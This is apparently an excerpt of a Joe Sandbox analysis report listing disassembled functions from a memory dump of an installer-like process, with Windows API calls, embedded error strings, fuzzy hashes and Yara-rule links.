Function 008E32F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008E3309
SysAllocString.OLEAUT32(?), ref: 008E3325
VariantClear.OLEAUT32(?), ref: 008E33AC
SysFreeString.OLEAUT32(00000000), ref: 008E33B7

Strings

xmlutil.cpp, xrefs: 008E333C
`Dv, xrefs: 008E33B7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `Dv$xmlutil.cpp
API String ID: 760788290-2876128059
Opcode ID: 82ef338fa32e2e3df03352cdc8c75e9b0aa89567f973dfdee301e447aad5452a
Instruction ID: bf483d31b12a16ccddf27a89ac44d685252ba48c1faeebdc4817d83659209647
Opcode Fuzzy Hash: 82ef338fa32e2e3df03352cdc8c75e9b0aa89567f973dfdee301e447aad5452a
Instruction Fuzzy Hash: 09218031900259AFCB21DB99D84DEAFBBB9FF86715F150168F915EB360CB319E008B91

Function 008B8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 008B8E37
GetLastError.KERNEL32 ref: 008B8E41
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 008B8EA1

Strings

Failed to allocate administrator SID., xrefs: 008B8E1D
Failed to initialize ACL., xrefs: 008B8E6F
cache.cpp, xrefs: 008B8E65

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 392252bc8524800339cf450b814e203b990217dc370cfe50f89ec7b25ad7d13d
Instruction ID: 05ecfca145445a626a901628740a24369efd1d70180bf3c928d248fc4d46ebe2
Opcode Fuzzy Hash: 392252bc8524800339cf450b814e203b990217dc370cfe50f89ec7b25ad7d13d
Instruction Fuzzy Hash: DD21C672A40229F7EB219A999C85FEFB76DFB44B20F114125BE14FB380DA74AD00C691

Function 008A4212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,008B4028,00000001,feclient.dll,?,00000000,?,?,?,008A4B12), ref: 008A424D
GetLastError.KERNEL32(?,?,008B4028,00000001,feclient.dll,?,00000000,?,?,?,008A4B12,?,?,008EB488,?,00000001), ref: 008A4259
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,008B4028,00000001,feclient.dll,?,00000000,?,?,?,008A4B12,?), ref: 008A4294
GetLastError.KERNEL32(?,?,008B4028,00000001,feclient.dll,?,00000000,?,?,?,008A4B12,?,?,008EB488,?,00000001), ref: 008A429E

Strings

crypt32.dll, xrefs: 008A4216
dirutil.cpp, xrefs: 008A42C2

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: 0425934b6ef8b7057a340e43804449d7fcdae2751e24fa7b3350a19ff7c51cf5
Instruction ID: 181df8193ec11e18efb93a776647d77915ce6e5d7488d27ffb2e8093e5a35f0e
Opcode Fuzzy Hash: 0425934b6ef8b7057a340e43804449d7fcdae2751e24fa7b3350a19ff7c51cf5
Instruction Fuzzy Hash: 5F118777E01637ABAB215AD9488475BBA58FF867617111175FE00EB650E760DC0086E0

Function 008C0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 008C0BDE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 008C0BFD
GetLastError.KERNEL32 ref: 008C0C07

Strings

Unexpected call to CabWrite()., xrefs: 008C0BC1
cabextract.cpp, xrefs: 008C0C2B
Failed to write during cabinet extraction., xrefs: 008C0C35

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: bb914da96487b8c72187fe900be6c4be3392b82cbc626f3fdb89b48d335cd676
Instruction ID: 850e1a6527419811c4ac47fb176c6b35423705ad9cc9b5c511a89f733e0bb4aa
Opcode Fuzzy Hash: bb914da96487b8c72187fe900be6c4be3392b82cbc626f3fdb89b48d335cd676
Instruction Fuzzy Hash: 77212376504209EBCB14CF6CC880E6A37B9FF84360B210159FE18CB341E631ED00DB60

Function 008A9AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9AFB
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,008AA8B4,00000100,000002C0,000002C0,00000100), ref: 008A9B10
GetLastError.KERNEL32(?,008AA8B4,00000100,000002C0,000002C0,00000100), ref: 008A9B1B

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 008A9B54
Failed to format variable string., xrefs: 008A9B06
Failed to set variable., xrefs: 008A9B7A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: f67e79932c2b9a471267943f07677634de353a795dd71d276fdbce4962ccf22b
Instruction ID: 9f383ccee58aa8760a14c3cef29d397dc2ed8071d1eda0130a1fc2be95809c21
Opcode Fuzzy Hash: f67e79932c2b9a471267943f07677634de353a795dd71d276fdbce4962ccf22b
Instruction Fuzzy Hash: 25113632944536FBEB221A98AC82F6EB658FF13330F100311FD50E65A087655D11A6E1

Function 008C0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 008C0CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008C0CD6
SetFileTime.KERNEL32(?,?,?,?), ref: 008C0CE9
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,008C08B1,?,?), ref: 008C0CF8

Strings

Invalid operation for this state., xrefs: 008C0C9D
cabextract.cpp, xrefs: 008C0C93

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 0e3d71241a236059be48386331628617fc812e5614e5db4d4d2b36f4868c169c
Instruction ID: bee625ed415cadc9b29691273e81e7aa4b2f9f5537bd17f1d4f4fb2774a201a8
Opcode Fuzzy Hash: 0e3d71241a236059be48386331628617fc812e5614e5db4d4d2b36f4868c169c
Instruction Fuzzy Hash: 5121C37280161AEB8B109FA8DD49EBA7BBCFF04760710431AFA65DA590D374EA51CF90

Function 008B4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,008B539D), ref: 008B4AC3

Strings

Failed to allocate message to write., xrefs: 008B4AA2
Failed to write message type to pipe., xrefs: 008B4B05
pipe.cpp, xrefs: 008B4AFB
crypt32.dll, xrefs: 008B4A7D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
API String ID: 3934441357-606776022
Opcode ID: 4a6dad5fef641bbc81b5cb574b6870d6b606168e8e295d5a8a9715ebb20d5744
Instruction ID: 20c916f3e3f0b41309d4facf6b9c6fcf84b7d7eafce9fcf8a5c64fbc866b250e
Opcode Fuzzy Hash: 4a6dad5fef641bbc81b5cb574b6870d6b606168e8e295d5a8a9715ebb20d5744
Instruction Fuzzy Hash: 6911CD32940129BBDB219F98DD06AEF7BA8FB40360F111066FA10F6351D730AE50D6A1

Function 008B4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

_memcpy_s.LIBCMT ref: 008B4693
_memcpy_s.LIBCMT ref: 008B46A6
_memcpy_s.LIBCMT ref: 008B46C1

Strings

Failed to allocate memory for message., xrefs: 008B467C
feclient.dll, xrefs: 008B465B, 008B4691
pipe.cpp, xrefs: 008B4672

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-766083570
Opcode ID: 7f55051301057577109de9b7ab4a60f620c5c97b418dc60353f1406f711c02ff
Instruction ID: da2c49360666f1ffcc9f798b1c95b06c8ba569612c8677f0bf09ebe346fe4f59
Opcode Fuzzy Hash: 7f55051301057577109de9b7ab4a60f620c5c97b418dc60353f1406f711c02ff
Instruction Fuzzy Hash: 9411917210020EABEB01AE98CC82CEB77ADFF16710B004526FA11DB242E775D65487E1

Function 008A9A4D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 008A9AC4

Strings

Condition, xrefs: 008A9A5F
Failed to copy condition string from BSTR, xrefs: 008A9AAE
Failed to select condition node., xrefs: 008A9A7B
Failed to get Condition inner text., xrefs: 008A9A94
`Dv, xrefs: 008A9AC4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeString
String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`Dv
API String ID: 3341692771-1896785106
Opcode ID: ccbe94aa18591d74e0370d6ae46776a922aa809d1fc3daace309ba55d77c7344
Instruction ID: 1a400a789a1d4ccbf545738f9975735bc43740867abd3e3c82417202e594292b
Opcode Fuzzy Hash: ccbe94aa18591d74e0370d6ae46776a922aa809d1fc3daace309ba55d77c7344
Instruction Fuzzy Hash: 3911A532909278BBEB129A95CD06FADBB68FF02755F204156FC41FB650CBB5AE40D680

Function 008A67AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 008A67E3
GetLastError.KERNEL32 ref: 008A67ED

Strings

Failed to get temp path., xrefs: 008A681B
variable.cpp, xrefs: 008A6811
Failed to set variant value., xrefs: 008A6837
4#v, xrefs: 008A67E3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4#v$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-2550301277
Opcode ID: fbde9e2f59b6b917ea264b4eadb57750a0c43f6916d24d6aa81470410d5c634b
Instruction ID: 07203e9091792c95f3602d921c4105c4112b55a1e926a0af15bbe9ce1d794591
Opcode Fuzzy Hash: fbde9e2f59b6b917ea264b4eadb57750a0c43f6916d24d6aa81470410d5c634b
Instruction Fuzzy Hash: 7301DB72E4173967E720A7545C06F9A77ACFB05B10F110175FE14FB281FA689D008AD6

Function 008E96CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 008E96FC
ReleaseSRWLockExclusive, xrefs: 008E970C
KERNEL32.DLL, xrefs: 008E96E7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: cd09a8a6f097fe0417c9b7c00dc19dbce7d2790d43c05c2a8b6d35569bcc002b
Instruction ID: 36cc1a7249dbb9fa9c82c2eb2059a8bb95926d5a9ba3686daa8275fffdd47ab9
Opcode Fuzzy Hash: cd09a8a6f097fe0417c9b7c00dc19dbce7d2790d43c05c2a8b6d35569bcc002b
Instruction Fuzzy Hash: 0A01F97166A3E39FCF315E675CC05D72388FA133A53100177D5A5D7150DB91C848A690

Function 008E0ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,008A5EB2,00000000), ref: 008E0AE0
GetProcAddress.KERNEL32(00000000), ref: 008E0AE7
GetLastError.KERNEL32(?,?,?,008A5EB2,00000000), ref: 008E0AFE

Strings

kernel32, xrefs: 008E0AD8
IsWow64Process, xrefs: 008E0AD1
procutil.cpp, xrefs: 008E0B1F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 55fb8d3f9b38609e221cb710cb09aa3ec551dc5cb0df77ec545a4372a28ae3ae
Instruction ID: 896bd449732162917902b0dcdc2f055dd63b6883becab7e13ae033ef9d7a8eb6
Opcode Fuzzy Hash: 55fb8d3f9b38609e221cb710cb09aa3ec551dc5cb0df77ec545a4372a28ae3ae
Instruction Fuzzy Hash: FBF0C872E04679ABC7219BD68C49D5FBB68FF41B65B010154BD14EB280EBB4ED40CBD0

Function 008DA20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008D3479,008D3479,?,?,?,008DA45C,00000001,00000001,ECE85006), ref: 008DA265
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008DA45C,00000001,00000001,ECE85006,?,?,?), ref: 008DA2EB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008DA3E5
__freea.LIBCMT ref: 008DA3F2

Part of subcall function 008D521A: HeapAlloc.KERNEL32(00000000,?,?,?,008D1F87,?,0000015D,?,?,?,?,008D33E0,000000FF,00000000,?,?), ref: 008D524C

__freea.LIBCMT ref: 008DA3FB
__freea.LIBCMT ref: 008DA420

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: 98b2ada20e99b6961dd3ecd30987f02e665246d612f1651aaa60f8093e2a9ce1
Instruction ID: cb6522cd7179e27bdce0c31ed5e14514c8f00ce451da996224f054d9decaa5ea
Opcode Fuzzy Hash: 98b2ada20e99b6961dd3ecd30987f02e665246d612f1651aaa60f8093e2a9ce1
Instruction Fuzzy Hash: AE51D272610216AFDB2D8E68CC81EAF77AAFB44750F25472AFD04D6340EB75DC808652

Function 008B8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 008B8D18

Strings

Failed to get old %hs package cache root directory., xrefs: 008B8DB8
per-user, xrefs: 008B8D72, 008B8D77, 008B8DB2, 008B8DB7
per-machine, xrefs: 008B8D69, 008B8DA9
Failed to calculate cache path., xrefs: 008B8CD5
Failed to get %hs package cache root directory., xrefs: 008B8D78

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: 2339687c1442c765da8c864daaad220d51c6cfc72a7b1262bdf829bdf62179f5
Instruction ID: 50638288efa3274c19102a8cfac845db43bacefb749b211a8fa1f76812ad6e6a
Opcode Fuzzy Hash: 2339687c1442c765da8c864daaad220d51c6cfc72a7b1262bdf829bdf62179f5
Instruction Fuzzy Hash: 4C31C772A40619FBEB12A6688C42FFF666CFF21754F154026FE00F7391DA749D10D6A2

Function 008BE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 008BE985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 008BE994
SetWindowLongW.USER32(?,000000EB,?), ref: 008BE9A8
DefWindowProcW.USER32(?,?,?,?), ref: 008BE9B8
GetWindowLongW.USER32(?,000000EB), ref: 008BE9D2
PostQuitMessage.USER32(00000000), ref: 008BEA31

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 722c1da60f9966254f4fcd723c75a77baab280323b4308bb7f616a7a850de9e6
Instruction ID: 1acd6b0782302531687cfd3e8b27d7e42741e24f045c511d6d5cfa12ee78149a
Opcode Fuzzy Hash: 722c1da60f9966254f4fcd723c75a77baab280323b4308bb7f616a7a850de9e6
Instruction Fuzzy Hash: 1C21B031104218BFDB119F68DC89EEA3BA9FF54310F144618F906DA3A4C731DD10DB51

Function 008BC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 008BC811
CloseHandle.KERNEL32(?), ref: 008BC819

Strings

Failed to save state., xrefs: 008BC891
Unexpected elevated message sent to child process, msg: %u, xrefs: 008BC9C4
elevation.cpp, xrefs: 008BC9B8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: ec47e64df4868a484c52bdff8515dd79f33f9ea1594a65581530b89616f5363b
Instruction ID: a358c12c79a5c44eb7a7ac869cf76575d80d3ccb16f891d9e31ec664cd63e697
Opcode Fuzzy Hash: ec47e64df4868a484c52bdff8515dd79f33f9ea1594a65581530b89616f5363b
Instruction Fuzzy Hash: F761C53A100514FFDB225F88CD41CA5BFB2FF087147158559FAA99A632C732E921EF46

Function 008E7B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

SysFreeString.OLEAUT32(00000000), ref: 008E7C74
SysFreeString.OLEAUT32(00000000), ref: 008E7C7F
SysFreeString.OLEAUT32(00000000), ref: 008E7C8A

Strings

atomutil.cpp, xrefs: 008E7B49
`Dv, xrefs: 008E7C69

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `Dv$atomutil.cpp
API String ID: 2724874077-1153537316
Opcode ID: 7f167168b9d0d6b14a780b7e790474dc6f9c20832da80e1f2a1068dcf3c5d234
Instruction ID: 58496f989971944bc883106bca8bfef7d17b4ff6ff1e9695fb252b4416bb3929
